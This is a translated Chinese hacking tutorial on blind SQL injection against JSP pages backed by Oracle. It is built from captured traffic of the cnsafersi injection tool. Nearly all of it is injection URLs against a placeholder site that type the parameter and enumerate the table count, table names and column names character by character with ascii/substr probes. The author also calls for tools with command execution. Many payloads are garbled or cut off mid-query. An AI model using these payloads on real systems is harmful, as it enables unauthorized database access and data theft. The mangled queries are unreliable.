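JSP+ORACLE Injection Methods Compiled v1.0
First, thanks to Huazai and his friend Hotkey for developing the cnsafersi injection tool; without it this article would not exist, hehe. This article analyzes and organizes the data obtained by capturing the packets sent by the cnsafersi injection tool. It was written in a hurry, so corrections from peers are welcome. I also hope some expert will develop a more powerful JSP injection program: cnsafersi currently offers only select functionality, and I suggest that a new JSP injection tool add insert/delete/update/backup/upload/system command execution and similar features, which could be modeled on NBSI. Reference article: "How to Develop CnSaferSI". First, an introduction to the tool used in this article, the JSP injection tool cnsafersi developed by Huazai and his friend Hotkey; I will write a detailed usage tutorial soon:
Below, the AD table from the figure above is used as an example to illustrate the JSP+ORACLE injection process:
1. Determining the injection type (numeric or string)
Telling string and numeric data apart: (hopefully someone can refine this further, splitting it into separate numeric and string checks)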
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And user>char(0)
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And userchar(0) And '1'='1
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url]' And userchar(0) And '%25'='
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url]' And userchar(0) And 1 in(1
[url]http://www.test.net/index_kaoyan_view.jsp?id=117)[/url] And userchar(0) And (' ')=('
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url]') And userstr(97)
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And str(98)http://www.test.net/index_kaoyan_view.jsp?id=117' And str(98)>str(97) And '1'='1
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url]' And str(98)http://www.test.net/index_kaoyan_view.jsp?id=117' And str(98)>str(97) And '%25'='
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url]' And userhttp://www.test.net/index_kaoyan_view.jsp?id=117) And str(98)>str(97) And 1 in(1
[url]http://www.test.net/index_kaoyan_view.jsp?id=117)[/url] And str(98)str(97) And (' ')=('
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url]') And str(98)
The page is displayed normally:
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And USER>CHR(0)
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And USER
2. Guessing the number of tables and the table names
The number of databases is 3:
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 0=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 2=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 3=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And UNISTR(1)>UNISTR(0)
The following guesses the number of tables
First digit of the table count: 1
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 52=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1)) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))
Second digit of the table count: 3
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 95=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 77=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 77>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 70=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 70>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 67=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 67>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 65=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 65>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 109=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 109>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 102=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 99=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 99>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 97=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 97>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 53=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) 
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 53>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 51=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
Third digit of the table count: 1
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 51=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 95=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 77=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 77>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 70=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 70>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 67=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 67>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 65=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 65>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 109=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 109>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 102=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 99=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 99>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 97=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 97>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 54=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 54>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 52=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
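There are 131 tables in total; see the figure above.
The following guesses the table names:
The following determines that the name length of the first table is: 2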
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 0
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 0
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 1>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 2
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 2
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 4>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 3=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 3>nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 2=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
The following determines that the first character of the first table name is: A
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
The following determines that the second character of the first table, AD, is: D
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 78=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 78>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 71=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 71>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 68=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
The following determines that the name length of the second table, ADER, is: 4
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 0
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 1>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 2
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 4>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 3=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 3>nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 4=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
The following determines that the first character of the second table, ADER, is: A
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
The following determines that the second character of the second table, ADER, is: D
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUMhttp://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 78=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 78>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 71=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUMascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 68=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
The following determines that the third character of the second table, ADER, is: E
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 68=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUMhttp://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 79=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 79>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 73=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 73>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 73>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 70=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 70>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 69=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
The following determines that the fourth character of the second table, ADER, is: R
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 69=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 80=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 80>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 80>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 85=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 85>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 82=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
The following determines the name length of the third table:
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 0
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 1>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 2
3. Guessing the column-name length and the column names:
a) The following guesses the field length as: 2 digits
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 0=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 2=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 3=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 3>nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 2=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)
Column-name length: 10 or more
The following guesses the first digit of the column-name length: 1 (tens place)
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 52=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),1,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 52>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),1,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 49=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),1,1))
The following guesses the second digit of the column-name length: 0 (ones place)
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 49=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 95=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 95=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 77=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 77>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 70=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 70>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 67=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 67>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 65=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 65>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 109=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 109>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 102=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 102>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 99=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 99>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 97=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 97>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 53=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 53>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 51=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 51>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 50=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 50>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 48=ascii(substr((SELECT COUNT(*) FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
The following guesses the length of the first field name, CLASS, of the first column: 5
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 0=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMnvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 5=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM
The following guesses the first character of the first field of the first column: C
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM
The following guesses the first character of the first field of the first column: L
